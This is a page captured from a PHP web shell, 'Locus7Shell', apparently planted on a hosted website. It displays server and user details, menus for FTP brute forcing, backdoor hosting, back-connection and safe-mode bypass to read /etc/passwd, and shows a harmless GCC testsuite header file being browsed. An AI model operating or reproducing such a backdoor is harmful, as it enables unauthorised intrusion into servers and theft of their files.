Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     var_stride_1.h (1.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
extern void abort (void) __attribute__ ((noreturn));

#define MARGIN 6

void __attribute__ ((weak, optimize ("no-tree-vectorize")))
test (int n, int m, int offset)
{
  int abs_n = (n < 0 ? -n : n);
  int abs_m = (m < 0 ? -m : m);
  int max_i = (abs_n > abs_m ? abs_n : abs_m);
  int abs_offset = (offset < 0 ? -offset : offset);
  int size = MARGIN * 2 + max_i * SIZE + abs_offset;
  TYPE *array = (TYPE *) __builtin_alloca (size * sizeof (TYPE));
  for (int i = 0; i < size; ++i)
    array[i] = i;
  int base_x = offset < 0 ? MARGIN - offset : MARGIN;
  int base_y = offset < 0 ? MARGIN : MARGIN + offset;
  int start_x = n < 0 ? base_x - n * (SIZE - 1) : base_x;
  int start_y = m < 0 ? base_y - m * (SIZE - 1) : base_y;
  f (&array[start_x], &array[start_y], n, m);
  int j = 0;
  int start = (n < 0 ? size - 1 : 0);
  int end = (n < 0 ? -1 : size);
  int inc = (n < 0 ? -1 : 1);
  for (int i = start; i != end; i += inc)
    {
      if (j == SIZE || i != start_x + j * n)
    {
      if (array[i] != i)
        abort ();
    }
      else if (n == 0)
    {
      TYPE sum = i;
      for (; j < SIZE; j++)
        {
          int next_y = start_y + j * m;
          if (n >= 0 ? next_y < i : next_y > i)
        sum += array[next_y];
          else if (next_y == i)
        sum += sum;
          else
        sum += next_y;
        }
      if (array[i] != sum)
        abort ();
    }
      else
    {
      int next_y = start_y + j * m;
      TYPE base = i;
      if (n >= 0 ? next_y < i : next_y > i)
        base += array[next_y];
      else
        base += next_y;
      if (array[i] != base)
        abort ();
      j += 1;
    }
    }
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--